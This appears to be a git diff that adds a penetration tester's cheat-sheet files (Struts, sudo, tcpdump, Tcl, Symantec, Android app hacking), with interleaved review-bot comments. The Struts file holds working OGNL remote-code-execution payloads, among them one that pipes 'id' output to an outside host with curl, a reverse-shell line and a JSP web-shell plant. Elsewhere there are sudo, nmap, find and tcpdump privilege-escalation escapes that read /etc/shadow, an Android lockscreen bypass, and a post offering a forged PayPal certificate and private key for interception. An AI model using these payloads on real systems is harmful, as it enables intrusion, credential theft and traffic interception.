+his "intercepting secure communication" training at Black Hat. This one's for
+www.paypal.com, and since the Microsoft crypto api appears to remain unpatched,
+it works flawlessly with sslsniff [3] against all clients on Windows (IE,
+Chrome, Safari). Also, because of Moxie's attacks against OCSP [4], I don't
+think this certificate can be revoked.
+
+Enjoy!
+
+[1]: http://www.linuxtoday.com/security/2009100102035NWNT
+[2]: http://www.thughtcrime.org/papers/null-prefix-attacks.pdf
+[3]: http://www.thoughtcrime.org/software/sslsniff/
+[4]: http://www.thoughtcrime.org/papers/ocsp-attack.pdf
+
+-----BEGIN CERTIFICATE-----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+-----END CERTIFICATE-----
+
+-----BEGIN RSA PRIVATE KEY-----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+-----END RSA PRIVATE KEY-----
+
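Review bot: The BEAST guidance (`we should prefer rc4 instead`, `tls1.0: rc4 preferred`) and the claim that RC4 attacks are not practical are stale: RC4 has been prohibited in TLS by RFC 7465 since 2015 and browsers dropped it in the same period, so these lines now recommend a cipher that should be reported as a finding rather than offered as a mitigation; TLS 1.2+ with AEAD suites is the current preference, with the 2013 roster link kept as history. Separately, the hunk commits a pasted certificate and an RSA private key verbatim; even as a historical exhibit the key should not live in the repository — keep the four reference links and drop the PEM blocks, or at least expect secret scanners to flag them.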
diff --git a/Cheat Sheet/ssrf b/Cheat Sheet/ssrf
new file mode 100644
index 0000000..1255acb
--- /dev/null
+++ b/Cheat Sheet/ssrf
@@ -0,0 +1,5 @@
+# ssrf
+
+https://cwe.mitre.org/data/definitions/918.html
+https://docs.google.com/document/d/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM/edit
+https://gist.github.com/mhmdiaa/2587e2330b87db99c81ace2a190e235f
diff --git a/Cheat Sheet/ssti b/Cheat Sheet/ssti
new file mode 100644
index 0000000..e9ae8c9
--- /dev/null
+++ b/Cheat Sheet/ssti
@@ -0,0 +1,9 @@
+# server side template injection ssti
+http://blog.orange.tw/2016/04/bug-bounty-uber-ubercom-remote-code_7.html
+https://nvisium.com/blog/2015/12/07/injecting-flask/
+https://nvisium.com/blog/2016/03/09/exploring-ssti-in-flask-jinja2/
+https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/
+http://blog.knownsec.com/2016/02/use-python-features-to-execute-arbitrary-codes-in-jinja2-templates/
+
+# detection and exploitation
+https://github.com/epinna/tplmap
diff --git a/Cheat Sheet/struts b/Cheat Sheet/struts
new file mode 100644
index 0000000..aca74ea
--- /dev/null
+++ b/Cheat Sheet/struts
@@ -0,0 +1,154 @@
+# struts
+
+# tutoriels developpez.com
+http://java.developpez.com/cours/?page=developpement-web-cat#struts
+
+# le premier est pas mal (simple et concis)
+http://rpouiller.developpez.com/tutoriel/java/struts-eclipse-tomcat/
+
+## VULNS
+http://struts.apache.org/downloads.html
+
+# worm attack
+https://www.mandiant.com/blog/responding-attacks-apache-struts2/
+$%7b%23a=(new%20java.lang.ProcessBuilder(new%20java.lang.String%5b%5d%7b'cat','/etc/passwd'%7d)).start(),%23b=%23a.getInputStream(),%23c=new%20java.io.InputStreamReader(%23b),%23d=new%20java.io.BufferedReader(%23c),%23e=new=%20char%5b50000%5d,%23d.read(%23e),%23o=%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23o.getWriter().println(%23e),%23o.getWriter().flush(),%23o.getWriter().close()%7d
+
+execute arbitrary OGNL code with ${} or %{}
+
+# good overview
+http://synacktiv.com/ressources/20121025-jssi_rouen-j2ee_frameworks.pdf
+
+# CVE-2010-1870
+http://blog.o0o.nu/2010/07/cve-2010-1870-struts2xwork-remote.html (good intro on OGNL)
+
+# CVE-2011-2730
+http://blog.mindedsecurity.com/2015/11/reliable-os-shell-with-el-expression.html (big one-liner payload with in-band cmd output)
+
+# CVE-2011-3923
+http://blog.o0o.nu/2012/01/cve-2011-3923-yet-another-struts2.html
+
+# CVE-2012-0391, CVE-2012-0392, CVE-2012-0393, CVE-2012-0394
+https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt (mirror http://www.exploit-db.com/exploits/18329/)
+msf: exploit/multi/http/struts_code_exec_exception_delegator
+PoC: /Test.action?id='%2b(%23_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec('calc'))%2b'
+PoC: Cookie: (#_memberAccess["allowStaticMethodAccess"]\u003dtrue)(x)=1; x[@java.lang.Runtime@getRuntime().exec('calc')]=1
+
+# CVE-2012-0838
+http://struts.apache.org/release/2.3.x/docs/s2-007.html
+
+# CVE-2013-1965
+https://cwiki.apache.org/confluence/display/WW/S2-012
+
+# CVE-2013-2115, CVE-2013-1966
+http://struts.apache.org/development/2.x/docs/s2-013.html https://cwiki.apache.org/confluence/display/WW/S2-014
+msf: exploit/multi/http/struts_include_params
+PoC: HelloWorld.action?fakeParam=%25%7B(%23_memberAccess%5B'allowStaticMethodAccess'%5D%3Dtrue)(%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D%3Dfalse)(%23writer%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23writer.println('hacked')%2C%23writer.close())%7D
+
+# CVE-2013-2134, CVE-2013-2135
+https://cwiki.apache.org/confluence/display/WW/S2-015
+
+# CVE-2013-2251
+http://struts.apache.org/release/2.3.x/docs/s2-016.html
+msf: exploit/multi/http/struts_default_action_mapper
+PoC: /blah/kikoo.action?redirect:%25{new%20java.lang.String('1337')}
+
+defined in WEB-INF/classes/struts.xml, each action can be called by appending ".action" to the action's name
+/index.action?redirect:${@java.lang.Runtime@getRuntime().exec("curl+6.6.6.6")} // blind
+/index.action?redirect:${(new+java.io.BufferedReader(new+java.io.InputStreamReader(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"UTF-8"))).readLine()} // inband
+/index.action?redirect:${(new+java.io.BufferedReader(new+java.io.InputStreamReader(new+java.lang.ProcessBuilder({"bash","-c","%s|gzip+-f|base64+-w0"}).start().getInputStream()),1000000)).readLine()}
+
+/blah.action?redirect:${(new+java.lang.ProcessBuilder(new+java.lang.String[]{'/bin/bash','-c','id|curl%206.6.6.6%20-d%20@-'})).start()} // outband
+/blah.action?redirect:${(new+java.lang.ProcessBuilder(new+java.lang.String[]{'/bin/bash','-c','/bin/bash%200%260%202>%260'})).start() // reverse shell
+
+http://seclists.org/bugtraq/2013/Aug/101
+ Immediate upgrade to the latest version is strongly recommended as
+ active attacks have already been observed. It should be noted that
+ redirect: and redirectAction: parameters were completely dropped and
+ do not work in the latest version as stated in the vender's page.
+ Thus attention for compatibility issues is required for upgrade.
+
+ If you cannot upgrade your Struts2 immediately, filtering (by custom
+ servlet filter, IPS, WAF and so on) can be a mitigation solution for
+ this vulnerability. Some points about filtering solution are listed
+ below.
+
+ - Both %{expr} and ${expr} notation can be used for attacks.
+ - Parameters both in querystring and in request body can be used.
+ - redirect: and redirectAction: can be used not only for Java method
+ execution but also for open redirect.
+
+# CVE-2014-0114 from ClassLoader manipulation to RCE (on Tomcat 8 only?)
+https://struts.apache.org/docs/s2-020.html
+http://openwall.com/lists/oss-security/2014/06/15/10
+http://www.slideshare.net/testpurposes/deep-inside-the-java-framework-apache-struts & https://github.com/julianvilas/rooted2k15
+
+fixed in common-beanutils-1.9.2 but any software bundled with an earlier version is therefore vuln, such as Apache Struts 1.3.10 which bundles commons-beanutils-1.8.0
+
+=> struts2
+welcome.action?...
+
+=> struts1
+Because struts1 was EOL'ed when this vuln was disclosed, a filter was provided for free (http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Protect-your-Struts1-applications/ba-p/6463188)
+however it could be bypassed by sending payload in body, so a v2 was provdided (http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Update-your-Struts-1-ClassLoader-manipulation-filters/ba-p/6639204) because
+the new extra-ordinary struts1 v1.3.11 which should completely fix this hasnt been released yet (https://issues.apache.org/jira/browse/STR/fixforversion/12327152/?selectedTab=com.atlassian.jira.jira-projects-plugin:version-summary-panel).
+struts team merged an actual fix instead of the filter workaround by HP, they didn't ship a release though, just merged the patch (see fork https://github.com/kawasima/struts1-forever)
+https://github.com/apache/struts1/pull/1/commits/09f92705bda6399b3885494b6e0e835bea477ac3 is the patch commit Red Hat backported to the versions they ship
+
+also might work: ?class['classLoader']['resources']['dirContext']['docBase']=/ or class['classLoader']['resources']['dirContext']['aliases']=/lol=/etc but it didnt for me on struts-1.3.10
+
+* tomcat8 - successfully tested against struts 1.2.7 on tomcat-8.0.8 (only works on tomcat8 as these properties are not avail in tomcat7) (works with .action too)
+/struts-mailreader/EditRegistration.do?class.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT
+/struts-mailreader/EditRegistration.do?class.classLoader.resources.context.parent.pipeline.first.prefix=shell
+/struts-mailreader/EditRegistration.do?class.classLoader.resources.context.parent.pipeline.first.suffix=.jsp
+/struts-mailreader/EditRegistration.do?class.classLoader.resources.context.parent.pipeline.first.fileDateFormat=1
+/struts-mailreader/whateverwillcause404.jsp?a=<%Runtime.getRuntime().exec("ls");%>
+/shell1.jsp -> results of ls
+
+* tomcat7 - sucessfully tested against struts 1.2.7 on tomcat-7.0.55 you make the classloader point to a share instead of local filesystem
+-- unsafe method (aka the chinese apt fuck'all way)
+/!\ warning if you change docBase it will break everything:
+http://127.0.0.1:8080/struts-mailreader/EditRegistration.do?class.classLoader.resources.dirContext.docBase=//192.168.122.1/share
+then look at wireshark to see what files it tries to load and replace them with malicious ones
+also to read local files
+http://127.0.0.1:8080/struts-mailreader/EditRegistration.do?class.classLoader.resources.dirContext.docBase=/
+http://127.0.0.1:8080/struts-mailreader/boot.ini
+the pb is to restore docBase you need to provide the full path like so:
+http://127.0.0.1:8080/struts-mailreader/EditRegistration.do?class.classLoader.resources.dirContext.docBase=/opt/m/tomcat/struts-mailreader
+
+-- safe way
+use aliases instead:
+http://127.0.0.1:8080/struts-mailreader/EditRegistration.do?class.classLoader.resources.dirContext.aliases=/lol=/etc
+http://127.0.0.1:8080/struts-mailreader/lol/passwd
+
+http://127.0.0.1:8080/struts-mailreader/EditRegistration.do?class.classLoader.resources.dirContext.aliases=/blah=//192.168.122.1/share
+http://127.0.0.1:8080/struts-mailreader/blah/rce.jsp
+
+-- successfully tested against struts 1.3.10 on tomcat-7.0.55 but with the cookbook example
+the mailreader example doesnt work because the RegistrationForm extends org.apache.struts.validator.DynaValidatorForm and not ActionForm or ValidatorForm as in 1.2.7
+the vuln happens right after the cast is done:
+ RegistrationForm regform = (RegistrationForm) form;
+
+* jarPath (seen on chinese sites) but seems to be for struts2
+welcome.do?class.classLoader.jarPath=(%23context%5b%22xwork.MethodAccessor.denyMethodExecution%22%5d%3d+new+java.lang.Boolean(false)%2c+%23_memberAccess%5b%22allowStaticMethodAccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime().exec(%27whoami%27).getInputStream()%2c%23b%3dnew+java.io.InputStreamReader(%23a)%2c%23c%3dnew+java.io.BufferedReader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23s3cur1ty%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23s3cur1ty.println(%23d)%2c%23s3cur1ty.close())(aa)&x[(class.classLoader.jarPath)('aa')]
+
+welcome.do?class.classLoader.jarPath=(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]=true, #a=@java.lang.Runtime@getRuntime().exec('whoami').getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[50000],#c.read(#d),#s3cur1ty=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#s3cur1ty.println(#d),#s3cur1ty.close())(aa)&x[(class.classLoader.jarPath)('aa')]
+
+* a few weeks after publication of original mitigation filter [1] a researcher found it can be bypassed [2] by sending payload in body
+http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Protect-your-Struts1-applications/ba-p/6463188 [1]
+http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Update-your-Struts-1-ClassLoader-manipulation-filters/ba-p/6639204 [2]
+
+* good read
+http://sec.baidu.com/index.php?research/detail/id/18
+http://drops.wooyun.org/papers/1377
+
+# CVE-2016-3081
+https://struts.apache.org/docs/s2-032.html
+http://drops.wooyun.org/papers/15430
+
+# not about S2-020
+http://zone.wooyun.org/content/3880
+http://blog.wangzhan.360.cn/?p=222
+http://www.hljy.com.cn/elmah.axd/detail?id=a6bddf7c-868f-4c15-afaa-662621bf0ad4
+
+# CVE-2017-5638
+https://svn.nmap.org/nmap/scripts/http-vuln-cve2017-5638.nse
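Review bot: The CVE-2014-0114 heading still carries the question `(on Tomcat 8 only?)`, but the notes below it document working tests on tomcat-7.0.55 via `dirContext.docBase`/`aliases` (only the `pipeline.first.*` properties in the tomcat8 bullet are Tomcat-8-specific), so the heading should state that rather than ask. The library name on the `fixed in` line is inconsistent (`common-beanutils-1.9.2` vs `commons-beanutils-1.8.0`); the artifact is `commons-beanutils`. The CVE-2017-5638 entry is a bare link; a one-line summary would help triage, e.g. `# S2-045: OGNL injection via the Content-Type header in the Jakarta Multipart parser; affects 2.3.5-2.3.31 and 2.5-2.5.10, fixed in 2.3.32 / 2.5.10.1`.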
diff --git a/Cheat Sheet/sudo b/Cheat Sheet/sudo
new file mode 100644
index 0000000..bf0372d
--- /dev/null
+++ b/Cheat Sheet/sudo
@@ -0,0 +1,63 @@
+# sudo
+
+Todd C. Miller is the main dev
+
+# sudoedit path not verified in sudo <= 1.7.2p5
+need local user with permission to run sudoedit
+
+# try run command that doesn't require password, if it fails it won't be logged
+sudo -n
+
+# tty_tickets (1.3.5-1.7.10 and 1.8.0-1.8.5) (CVE-2013-1776)
+https://gist.github.com/ryancdotorg/5136278 #exploit
+
+# env variables not sanitized (sudo <= 1.6.9p18)
+# env_reset must be disabled (!env_reset) or dangerous env vars must be whitelisted
+# PS4 trick. Added to blacklist in 1.6.8p10
+0511-exploits/sudo168p10.sh.txt (Nov 2005)
+# LD_PRELOAD trick
+0811-exploits/sudo-local.txt (Nov 2008)
+http://www.sensepost.com/blog/9108.html (2013)
+
+# can any of the allowed programs be overwritten/created?
+
+# sudo -k epoch bug (1.6.0-1.7.10p6 and 1.8.0-1.8.6p6)
+# msf module tested working on Mac OS 10.7-10.8.4 (patched in 10.9 beta)
+http://www.sudo.ws/sudo/alerts/epoch_ticket.html
+msf module: http://packetstormsecurity.com/files/122965 http://www.exploit-db.com/exploits/27944/
+chris l'a fait avec systemsetup mais utiliser dscl serait "plus simple"
+il faut etre un utilisateur interactif (uid < 500) pour avoir le droit d'executer systemsetup
+
+# CVE-2014-9680
+http://www.sudo.ws/alerts/tz.html
+
+# tricks & shell escapes
+$ TZ=/etc/shadow sudo -u root date
+
+$ nmap --interactive
+nmap> !id
+$ sudo nmap -iL /etc/shadow
+Failed to resolve “root:$6$tacL...
+
+$ sudo find /dev/null -exec id \; # shell escape
+uid=0(root) gid=0(root) groups=0(root)
+
+http://0x90909090.blogspot.com.au/2015/07/no-one-expect-command-execution.html # moar
+
+## sudo tests
+* how to test
+cat /opt/path/test.sh <<'EOF'
+#!/bin/bash
+echo "PS4: $PS4"
+EOF
+chmod +x /opt/patht/test.sh
+
+# visudo
+Defaults !env_reset
+john ALL=(root) /opt/path/test.sh
+
+$ sudo PS4=blah /opt/path/test.sh
+PS4: blah # sudo is vuln
+
+$ sudo PS4=blah /opt/path/test.sh
+PS4: + # sudo is NOT vuln
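Review bot: The harness under `sudo tests` never produces the script it relies on: `cat /opt/path/test.sh <<'EOF'` feeds the heredoc to cat's stdin while cat tries to read the nonexistent file argument, so nothing is written; it needs a redirection, `cat > /opt/path/test.sh <<'EOF'`. The chmod line then targets a different path (`/opt/patht/test.sh`) from the sudoers entry and the invocation (`/opt/path/test.sh`), so the script would not be executable even once created. Both lines should use the single path that the `john ALL=(root) /opt/path/test.sh` rule names.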
diff --git a/Cheat Sheet/svg b/Cheat Sheet/svg
new file mode 100644
index 0000000..c557d2e
--- /dev/null
+++ b/Cheat Sheet/svg
@@ -0,0 +1,5 @@
+# svg
+
+# http://www.insinuator.net/2015/03/xxe-injection-in-apache-batik-library-cve-2015-0250/ can place text into images with SVG
+# vuln on Apache Batik (1.0 – 1.7).
+ ]>&xxe;
diff --git a/Cheat Sheet/sybase b/Cheat Sheet/sybase
new file mode 100644
index 0000000..374e0b9
--- /dev/null
+++ b/Cheat Sheet/sybase
@@ -0,0 +1,3 @@
+# sybase
+
+default creds: DBA/SQL
diff --git a/Cheat Sheet/symantec b/Cheat Sheet/symantec
new file mode 100644
index 0000000..7dbe0c6
--- /dev/null
+++ b/Cheat Sheet/symantec
@@ -0,0 +1,19 @@
+# symantec
+
+nmap -p38292,12174,2967,8443,9090
+
+# Symantec System Center Alert Management System
+38292/tcp ./modules/exploits/windows/antivirus/ams_hndlrsvc.rb ./modules/exploits/windows/antivirus/symantec_iao.rb
+12174/tcp ./modules/exploits/windows/antivirus/ams_xfr.rb
+2967/tcp ./modules/exploits/windows/antivirus/symantec_rtvscan.rb (buffer overflow)
+
+# SEP Manager
+8443/tcp & 9090/tcp
+http://codewhitesec.blogspot.nl/2015/07/symantec-endpoint-protection.html
+https://github.com/brandonprry/metasploit-framework/blob/sepm_bypass_rce/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
+
+# signatures
+http://www.symantec.com/security_response/attacksignatures/
+
+# Symantec Messaging Gateway Version 10.6.3-2
+http://seclists.org/fulldisclosure/2017/Aug/28
diff --git a/Cheat Sheet/symfony b/Cheat Sheet/symfony
new file mode 100644
index 0000000..f360a6a
--- /dev/null
+++ b/Cheat Sheet/symfony
@@ -0,0 +1,6 @@
+# symfony
+
+if symfony exists
+go to app_dev.php/_profiler/
+if they misprovisioned you can do fun stuff
+http://account.leagueoflegends.com/app_dev.php/_profiler/phpinfo
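Review bot: The note says `if they misprovisioned` without naming the misconfiguration, which is the part a defender needs: the dev front controller `app_dev.php` is intended for local use only (its stock version refuses requests not coming from loopback/allow-listed IPs and is not supposed to be shipped), so a reachable `_profiler/` on a public host means the file was deployed or its IP check removed. I'd add `# misconfig: app_dev.php deployed/reachable in prod; fix is to exclude it from the release (or restrict it by IP) and keep the web profiler bundle dev-only`.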
diff --git a/Cheat Sheet/sysinternals b/Cheat Sheet/sysinternals
new file mode 100644
index 0000000..87a51f8
--- /dev/null
+++ b/Cheat Sheet/sysinternals
@@ -0,0 +1,21 @@
+# sysinternals
+
+# description of every tools
+http://technet.microsoft.com/en-au/sysinternals/bb545027.aspx
+
+# secu
+PsLoggedOn
+RootkitRevealer
+
+# info systeme
+PendMoves
+
+# outils pour fichier et disque
+cacheset
+contig -s -v -a c:\
+diskview
+pagedefrag
+pendmoves
+
+# tous les outils sysinternals, valider automatiquement la popup
+procexp /accepteula
diff --git a/Cheat Sheet/tcl b/Cheat Sheet/tcl
new file mode 100644
index 0000000..bc95bb1
--- /dev/null
+++ b/Cheat Sheet/tcl
@@ -0,0 +1,51 @@
+# tcl
+
+A command within square brackets ([]) is replaced with the return value from the execution of that command.
+Words within double quotes or braces are grouped into a single argument. However, double quotes and braces cause different behavior during the substitution phase.
+By contrast, grouping words within double braces *disables* substitution within the braces
+Characters within braces are passed to a command exactly as written. The only "Backslash Sequence" that is processed within braces is the backslash at the end of a line. This is still a line continuation character.
+Inside an already grouped string (" ou {}) a brace is treated as ASCII character
+If the string is grouped with quotes, substitutions will occur within the quoted string, even between the braces.
+command in [] is actually part of the Tcl substitution phase.
+A square bracket within braces is not modified during the substitution phase.
+set returns the new value of the variable
+The test expression following if should return one of:
+ False True
+ ------- ------
+ a numeric value 0 all others
+ yes/no no yes
+ true/false false true
+
+True/FALSE or YeS/nO are legitimate return
+The test expression following if may be enclosed within quotes, or braces. If it is enclosed within braces, it will be evaluated within the if command, and if enclosed within quotes it will be evaluated during the substitution phase, and then another round of substitutions will be done within the if command.
+
+set y x;
+if "$$y != 1" {
+
+When proc is invoked, it creates a structure to define the procedure, and adds that structure and name to the tables used when parsing commands. If the command already existed, then it will be replaced by the new command with the same name.
+
+si ya pas de return, proc will return the value of the last command to be executed.
+
+"blah{$toto}"
+{blah{$toto}}
+
+## vuln
+tclsh8.5 [~]set cc {[puts pwn]}
+[puts pwn]
+tclsh8.5 [~]if $cc { puts "ok" }
+
+## pas vuln
+tclsh8.5 [~]if [catch {$cc} msg] { puts "ok" }
+ok
+
+## vuln
+tclsh8.5 [~]if [catch $cc msg] { puts "ok: $msg" } else { puts "else:$msg" }
+pwn
+ok: empty command name ""
+
+## pas vuln
+eval $lqry
+
+de manière générale, faire eval d'une liste ne presente pas de vuln
+
+
diff --git a/Cheat Sheet/tcpdump b/Cheat Sheet/tcpdump
new file mode 100644
index 0000000..593f0e0
--- /dev/null
+++ b/Cheat Sheet/tcpdump
@@ -0,0 +1,6 @@
+# tcpdump
+
+# privesc
+$ echo /etc/shadow > /tmp/lol; chmod +x /tmp/lol
+$ sudo tcpdump -ln -i em1 -w /tmp/blah.cap -c 100 -G 1 -z /tmp/lol
+
diff --git a/Cheat Sheet/tcpip b/Cheat Sheet/tcpip
new file mode 100644
index 0000000..9bad52f
--- /dev/null
+++ b/Cheat Sheet/tcpip
@@ -0,0 +1,9 @@
+# ip tcp
+
+https://code.google.com/p/packetdrill/
+
+# tcp syn cookies allows an attacker to spoof a tcp connection
+http://www.jakoblell.com/blog/2013/08/13/quick-blind-tcp-connection-spoofing-with-syn-cookies/
+
+# injecting raw sockets in python
+http://www.pythonforpentesting.com/2014/08/tcp-packet-injection-with-python.html
diff --git a/Cheat Sheet/tftp b/Cheat Sheet/tftp
new file mode 100644
index 0000000..779d179
--- /dev/null
+++ b/Cheat Sheet/tftp
@@ -0,0 +1,5 @@
+# tftp
+
+# bruteforce
+hg clone https://code.google.com/p/tftptheft/
+
diff --git a/Cheat Sheet/tightvnc b/Cheat Sheet/tightvnc
new file mode 100644
index 0000000..86cea3a
--- /dev/null
+++ b/Cheat Sheet/tightvnc
@@ -0,0 +1,10 @@
+# tightvnc
+
+- password key
+"HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server", "Password"
+
+- password to lock the 'options'
+"HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server", "ControlPassword"
+
+- to enable using passwords
+"HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server", "UseControlAuthentication
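Review bot: The last registry entry on this line is missing its closing quote, so the three entries are no longer written in the same form: `"HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server", "UseControlAuthentication"`. It would also help a reader to note that the first two values hold stored passwords, so this key is something to check for in a host-hardening review and to monitor for reads and writes, while the third is only a boolean that enables the control password.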
diff --git a/Cheat Sheet/tls b/Cheat Sheet/tls
new file mode 100644
index 0000000..486f2f6
--- /dev/null
+++ b/Cheat Sheet/tls
@@ -0,0 +1,8 @@
+# tls renegotiation
+
+# tester manuellement
+http://blog.ivanristic.com/2009/12/testing-for-ssl-renegotiation.html
+
+# PoC
+http://www.redteam-pentesting.de/en/publications/tls-renegotiation/-tls-renegotiation-vulnerability-proof-of-concept-code
+
diff --git a/Cheat Sheet/tmahh b/Cheat Sheet/tmahh
new file mode 100644
index 0000000..06c95cb
--- /dev/null
+++ b/Cheat Sheet/tmahh
@@ -0,0 +1,322 @@
+# the mobile application hacker's handbook
+
+jdk1.6
+
+alternatives to android's official emulator, such as genymotion, run x86 versions of Android and some applications that contain native code may not support this architecture. However, for exploring Android to understand how it works, they are useful and some may run quicker than the Google emulators. However, it is still the author’s preference to use the official Android emulator as it is always guaranteed to be unmodified.
+
+* Dalvik VM hello world (need jdk1.6). Dalvik later replaced by ART (Android Runtime) in Android 4.4 to improve speed
+$ javac Test.java
+$ dx –dex –output=test.jar Test.class
+
+* app installation process
+The installation process via the GTalkService was explored in an excellent blog post by Jon Oberheide at https://jon.oberheide.org/blog/2010/06/28/a‐peek‐ inside‐the‐gtalkservice‐connection/. The
+
+adb install actually calls /system/bin/pm
+
+* key tools
+pm disable useful for disabling pesky applications that came with your device
+getprop This tool allows you to retrieve all system properties including verbose hardware and software information.
+dumpsys This tool displays information about the status of system services. If run without any arguments it iterates through all system services. You can also find these services by running service list.
+
+* drozer
+drozer agent build --permission android.permission.INSTALL_PACKAGES
+adb install /tmp/agent.apk
+adb forward tcp:31415 tcp:31415
+
+drozer console connect
+list package
+module search -d
+module install
+shell
+run app.package.info ‐h
+run app.package.info -a com.android.browser
+
+run app.package.list ‐p android.permission.READ_SMS
+run app.provider.info ‐p android.permission.READ_SMS
+
+run app.package.list ‐f "Terminal Emulator"
+
+* components
+kernel module /dev/binder (IPC)
+activity
+service (can be started or bound to)
+broadcast receiver (register for events)
+content provider (data storehouses, commonly sqlite)
+intent (implicit or explicit)
+run app.activity.start --action android.intent.action.VIEW --data‐uri http://www.google.com --component com.android.browser com.android.browser.BrowserActivity
+run app.provider.query content://settings/system
+
+* misc
+FORWARD_LOCK /data/app-private but since 4.1, apps are stored with .asec in /data/app‐asec and encrypted with device-specific key (/data/misc/systemkeys/AppsOnSD.sks)
+/data/dalvik-cache replaced by ART since 5.0
+/dev/socket/zygote
+protection level: signature 0x2 Indicates that this permission can only be granted to another application that was signed with the same certificate as the application that defined the permission.
+sharedUserId
+android sandbox == linux user/group perms + IPC calls to binder
+FDE only encrypts /data. Look for app storing sensitive data on sdcard. Some manufacturers have customized Android to include the encryption of the SD card.
+ODEX file can be converted to .dex using baksmali+smali
+OAT file still contains the original classes.dex file (use oat2dex), useful if original .apk is no longer avail on device.
+content providers exported by default on API<17 == /data/local/tmp/manif.xml
+sharedUserId of android.uid.system? (effectively sets UID to 1000, a privileged context on a device)
+
+* exported components
+Even if activity does not have android:exported attribute if an intent filter is present, the activity is still exported.
+Code running as root or system can interact with any component and send intents to them even when they are not exported in their manifest.
+Protection level signature ensures that only another application that was signed by the same certificate can interact with component.
+See Protection Level Downgrade Attack (install malicious app that defines and uses the Twitter app's permissions with normal level, when installing the Twitter app the perms will be normal instead of signature)
+ can also allow access to activities that are not exported (explicitly or through the use of intent filters), app.activity.info will list any aliases.
+activities can send info back to caller when they finish(). Checking whether an activity sends a result back is as simple as checking for the existence of the keyword setResult in the activity’s code. If the calling application started the activity using startActivityForResult()rather than startActivity() then the intent received from the started activity can be caught inside the overridden onActivityResult() callback.
+
+run app.package.attacksurface com.blah.app
+
+run app.broadcast.info -a
+run app.provider.info -a
+run app.activity.info -a
+run app.service.info -a
+use -u to list components that are not exported
+run app.package.launchintent com.blah.app #finds main activity (android.intent.action.MAIN)
+
+dz> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList # invoke another exported activity
+adb# am start -n com.mwr.example.sieve/.SettingsActivity
+adb $ am start -n com.android.settings/com.android.settings.ChooseLockGeneric --ez confirm_credentials false --ei lockscreen.password_type 0 --activity-clear-task # CVE -2013-6271 lockscreen bypass <4.4
+
+* tapjacking
+grep -qr filterTouchesWhenObscured || echo vuln
+/!\ Some device vendors have mitigated tapjacking at an OS level. For instance, Samsung devices running Android versions Ice Cream Sandwich and later do not allow any touches to reach an underlying activity when there is a toast present on the screen, regardless of whether the filterTouchesWhenObscured attribute is set or not.
+
+* recent app screenshots
+
+* fragment injection
+All exported activities that extend PreferenceActivity and are running on Android 4.3 or prior are vulnerable. This attack was mitigated by Android in versions 4.4 onward by providing a new method in the PreferenceActivity class named isValidFragment() to allow developers to override it and validate which fragments can be loaded inside the activity
+
+change the PIN on a device running Android 4.3 or earlier
+run app.activity.start --component com.android.settings com.android.settings.Settings --extra string :android:show_fragment com.android.settings.ChooseLockPassword$ChooseLockPasswordFragment --extra boolean confirmcredentials false
+
+* trust boundaries
+
+* unprotected content providers
+app targets API<17 but exported="false" is not explicitly stated
+
+run app.provider.finduri # checks only for strings inside that DEX file that begin with content:// (should not be relied upon)
+run app.provider.query com.blah.app
+content query --uri content://com.mwr.example.sieve.DBContentProvider/Passwords (can be run only from an ADB shell and not inside an application because it is protected by the android.permission.ACCESS_CONTENT_PROVIDERS_EXTERNALLY permission, which has a protection level of signature defined by the android package)
+
+- SQL injection
+
+- file-backed content providers
+dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/system/etc/hosts
+127.0.0.1 localhost
+dz> run app.provider.read content://com.shazam.android.AdMarvelCachedImageLocalFileContentProvider/../../../../../../../../system/etc/hosts
+dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/../../../../data/data/com.mwr.example.sieve/databases/database.db
+
+run scanner.provider.traversal -a content://com.mwr.example.sieve.FileBackupProvider
+
+- pattern-matching flaws
+
+* unprotected started services
+Started services are ones that implement the onStartCommand() method inside its class. The code may perform an unsafe task even just by being started or may use parameters that are sent and when certain conditions take place, perform an unexpected action.
+review src code
+dz> run app.service.start
+
+ClipboardSaveService on Samsung
+adb shell am startservice -a com.android.clipboardsaveservice.CLIPBOARD_SAVE_SERVICE --es copyPath /sdcard/bla --es pastePath /sdcard/restore/
+dz> run app.service.start --action com.android.clipboardsaveservice.CLIPBOARD_SAVE_SERVICE --extra string copyPath /sdcard/bla --extra string pastePath /sdcard/restore/
+
+- unprotected bound services
+review handleMessage()
+see book
+
+* unprotected broadcast receivers
+check if any have been registered at runtime with registerReceiver() (dz module wont find them)
+
+CVE -2013-6272 initiate or terminate phone calls <=4.4.2
+dz> run app.broadcast.send --component com.android.phone com.android.phone.PhoneGlobals$NotificationBroadcastReceiver --action com.android.phone.ACTION_CALL_BACK_FROM_NOTIFICATION --data-uri tel:123456789
+
+- intent sniffing
+apps that broadcast intents containing sensitive and do not define required permissions that a broadcast receiver must hold or do not provide a destination package.
+search for sendBroadcast()
+dz> run app.broadcast.sniff --action android.intent.action.BATTERY_CHANGED
+
